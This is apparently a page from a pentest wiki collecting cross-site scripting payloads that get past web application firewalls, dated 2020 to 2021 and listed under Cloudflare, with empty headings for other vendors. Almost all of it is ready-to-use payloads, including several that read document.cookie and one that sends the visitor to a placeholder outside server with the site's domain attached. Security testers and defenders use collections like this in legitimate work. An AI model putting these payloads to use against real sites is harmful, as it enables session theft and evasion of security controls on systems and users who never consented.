WAF Bypasses
The payloads are headed by the date of discovery of the bypass.
Cloudflare
//29-11-2021:
<img/src=x onError="`${x}`;alert(`XSS`);">
//26-11-2021:
-top['al\x65rt']('xss')-
//24-10-2021:
<svg onload=alert(document.cookie)>
//06-10-2021:
";(a=alert,b=1,a(b))
//17-08-2021:
"<iframe src=javascript:alert(1) >"
//04-08-2021:
%27%09);%0d%0a%09%09[1].find(alert)//
//22-05-2021:
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
//12-04-2021:
<svg/onload=location/**/='https://your.server/'+document.domain>
//25-02-2021:
<svg onx=() onload=(confirm)(1)>
//25-01-2021:
<svg/onrandom=random onload=confirm(1)>
//11-01-2021:
<svg onload=alert%26%230000000040"1")>
//23-12-2020:
<img%20id=%26%23x101;%20src=x%20onerror=%26%23x101;;alert`1`;>Imperva
Akamai
Fortiweb
Last updated
Was this helpful?